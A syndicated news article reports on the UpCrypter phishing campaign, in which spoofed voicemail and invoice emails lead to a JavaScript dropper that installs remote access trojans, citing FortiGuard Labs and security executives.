Upcrypter Phishing Campaign Escalates Cyber Threat
(MENAFN- The Arabian Post)
Hackers are employing sophisticated phishing tactics to deploy a malware loader known as UpCrypter, granting them long-term control over Windows devices worldwide. Disguised as voicemails or purchase order messages, these phishing emails redirect recipients to highly personalised spoofed sites. Those who download the attachments are compromised through a multi-stage infection chain that ultimately installs powerful Remote Access Trojans.
Fortinet's FortiGuard Labs has tracked the campaign, observing how HTML attachments like“Missed Phone Call” or invoice-themed files launch users to counterfeit landing pages. These pages display the victim's own domain and company logo, bolstering credibility before prompting the download of a ZIP archive containing an obfuscated JavaScript dropper for UpCrypter.
Once the dropper is executed, PowerShell commands run stealthily to contact attacker-controlled servers. The dropper performs checks for sandboxing or forensic tools and may trigger a system reboot if such tools are detected, effectively evading analysis.
Following these checks, UpCrypter downloads additional malicious payloads-frequently concealed within image files using steganography-or delivered as plain text meant for in-memory execution. Among the RATs deployed are PureHVNC, DCRat, and Babylon RAT. These tools enable attackers to maintain persistent remote access and execute spying or data exfiltration operations.
Security researchers describe the campaign as dynamic and dangerously adaptive. Detection counts have reportedly more than doubled within a fortnight, reflecting a rapid spread across sectors including manufacturing, healthcare, technology, construction, retail, and hospitality. Geographic hotspots include Austria, Belarus, Canada, Egypt, India, and Pakistan.
This operation marks a notable shift from credential-harvesting phishing to full-blown network infiltration. As J Stephen Kowski, Field CTO at SlashNext Email Security, stresses,“this isn't a one‐time data theft-it's a full system breach that can spread quietly inside company networks.” Frankie Sclafani, Director of Cybersecurity Enablement at Deepwatch, similarly termed the campaign“a highly sophisticated and dangerous threat”, urging adoption of layered defences.
See also AI-driven video tool creates original series in minutes Notice an issue? Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com . We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.
Legal Disclaimer:
MENAFN provides the
information “as is” without warranty of any kind. We do not accept
any responsibility or liability for the accuracy, content, images,
videos, licenses, completeness, legality, or reliability of the information
contained in this article. If you have any complaints or copyright
issues related to this article, kindly contact the provider above.
Most popular stories
Market Research
- Cryptogames Introduces Platform Enhancements Including Affiliate Program Changes
- Cartesian Launches First Outsourced Middle-Back-Office Offering For Digital Asset Funds
- $MBG Token Supply Reduced By 4.86M In First Buyback And Burn By Multibank Group
- Ethereum Based Meme Coin Pepeto Presale Past $6.6 Million As Exchange Demo Launches
- Daytrading Publishes New Study On The Dangers Of AI Tools Used By Traders
- 1Inch Unlocks Access To Tokenized Rwas Via Swap API
More Story
Comments
No comment